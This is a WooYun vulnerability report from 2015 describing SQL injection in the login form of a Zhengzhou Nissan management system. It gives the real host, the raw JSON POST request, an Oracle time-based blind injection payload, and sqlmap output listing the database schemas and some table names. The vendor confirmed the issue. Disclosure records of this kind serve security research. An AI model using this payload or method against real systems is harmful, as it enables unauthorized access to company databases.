当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0156351

漏洞标题:郑州日产某管理系统SQL注入#可获取大量数据信息

相关厂商:郑州日产汽车有限公司

漏洞作者: 路人甲

提交时间:2015-11-27 15:48

修复时间:2016-01-11 15:58

公开时间:2016-01-11 15:58

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-27: 细节已通知厂商并且等待厂商处理中
2015-11-27: 厂商已经确认,细节仅向厂商公开
2015-12-07: 细节向核心白帽子及相关领域专家公开
2015-12-17: 细节向普通白帽子公开
2015-12-27: 细节向实习白帽子公开
2016-01-11: 细节向公众公开

简要描述:

RT、大量数据库信息

详细说明:

0x01 漏洞位置

eip.zznissan.com.cn:2051

还是电动车管理系统、刚才只是试了弱口令,深入测试一下
0x02 漏洞类型

sql注入---登录处


0x03 漏洞详情
在登录处

4J$T{2S0TA38(Q]])C]6]NO.png


抓取POST包、发现请求数据是json格式、有门~~~

POST /Data/UserManagement.svc/LoginForWebUser HTTP/1.1
Host: eip.zznissan.com.cn:2051
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/json; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://eip.zznissan.com.cn:2051/indexLogin.htm
Content-Length: 35
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
{"UserName":"aaa","Password":"aaa"}


0x04 漏洞利用
sqlmap测试即可

漏洞证明:

0X05 漏洞结果证明
于是乎、发现了大量数据信息
注入信息

sqlmap identified the following injection points with a total of 101 HTTP(s) requests:
---
Place: (custom) POST
Parameter: JSON #1*
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: {"UserName":"aaa' AND 7527=DBMS_PIPE.RECEIVE_MESSAGE(CHR(107)||CHR(104)||CHR(117)||CHR(112),5) AND 'pfws'='pfws","Password":"aaa"}
---
[13:46:38] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5
back-end DBMS: Oracle


数据库信息

available databases [24]:
[*] "IX\X02"
[*] "OWBSYS!"
[*] APEX_030200
[*] APPQOSSYS
[*] CTXSYS
[*] DBSNMP
[*] EXFSYS
[*] FLOWS_FILES
[*] HR
[*] MDSYS
[*] OE
[*] OLAPSYS
[*] ORDDATA
[*] ORDSYS
[*] OUTMN
[*] PM
[*] RICHAN
[*] SCOTT
[*] SH
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] WMSYS
[*] XDB


表数据获取就很简单了、这里不做过多深入

[15:38:08] [INFO] fetching database (schema) names
[15:38:08] [INFO] fetching number of databases
[15:38:08] [INFO] resumed: 24
[15:38:08] [INFO] resumed: APEX_030200
[15:38:08] [INFO] resumed: APPQOSSYS
[15:38:08] [INFO] resumed: CTXSYS
[15:38:08] [INFO] resumed: DBSNMP
[15:38:08] [INFO] resumed: EXFSYS
[15:38:08] [INFO] resumed: FLOWS_FILES
[15:38:08] [INFO] resumed: HR
[15:38:08] [INFO] resumed: IX\x02
[15:38:08] [INFO] resumed: MDSYS
[15:38:08] [INFO] resumed: OE
[15:38:08] [INFO] resumed: OLAPSYS
[15:38:08] [INFO] resumed: ORDDATA
[15:38:08] [INFO] resumed: ORDSYS
[15:38:08] [INFO] resumed: OUTMN
[15:38:08] [INFO] resumed: OWBSYS!
[15:38:08] [INFO] resumed: PM
[15:38:08] [INFO] resumed: RICHAN
[15:38:08] [INFO] resumed: SCOTT
[15:38:08] [INFO] resumed: SH
[15:38:08] [INFO] resumed: SYS
[15:38:08] [INFO] resumed: SYSMAN
[15:38:08] [INFO] resumed: SYSTEM
[15:38:08] [INFO] resumed: WMSYS
[15:38:08] [INFO] resumed: XDB
[15:38:08] [INFO] fetching tables for databases: 'IX, OWBSYS!, APEX_030200, APPQOSSYS, CTXSYS, DBSNMP, EXFSYS, FLOWS_FILES, HR, MDSYS, OE, OLAPSYS, ORDDATA, ORDSYS, OUTMN, PM, RICHAN, SCOTT, SH, SYS, SYSMAN, SYSTEM, WMSYS, XDB'
[15:38:08] [INFO] fetching number of tables for database 'ORDSYS'
[15:38:08] [INFO] resumed: 5
[15:38:08] [INFO] resumed: SI_IMAGE_FORMATS_TAB
[15:38:08] [INFO] resumed: SI_FEATURES_TAB
[15:38:08] [INFO] resumed: SI_VALUES_TABA
[15:38:08] [INFO] resumed: ORD_USAGE_RECS
[15:38:08] [INFO] resumed: ORD_CARTRIDGE_COMPONENTS
[15:38:08] [INFO] fetching number of tables for database 'HR'
[15:38:08] [INFO] resumed: 7
[15:38:08] [INFO] resumed: REGIONS
[15:38:08] [INFO] resumed: LOCATIONS!
[15:38:08] [INFO] resumed: DEPARTMENTS
[15:38:08] [INFO] resumed: JOBS
[15:38:08] [INFO] resumed: EMPLOYEES
[15:38:08] [INFO] resumed: JOB_HISTORY
[15:38:08] [INFO] resumed: CQUNTRIES
[15:38:08] [INFO] fetching number of tables for database 'APEX_030200'
[15:38:08] [INFO] resumed: 360
[15:38:08] [INFO] resumed: WWV_FLOW_COMPANIES
[15:38:08] [INFO] resumed: WWV_FLOW_ACTIVITY_LOG_NUMBER%
[15:38:08] [INFO] resumed: WWV_FLOW_USER_ACCESS_LOG_NUM$
[15:38:08] [INFO] resumed: WWV_FLOW_DUAL100


测试即可、ok了

修复方案:

交给厂家吧

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-11-27 15:57

厂商回复:

弱口令的惨案啊。洞主用心了。谢谢!

最新状态:

暂无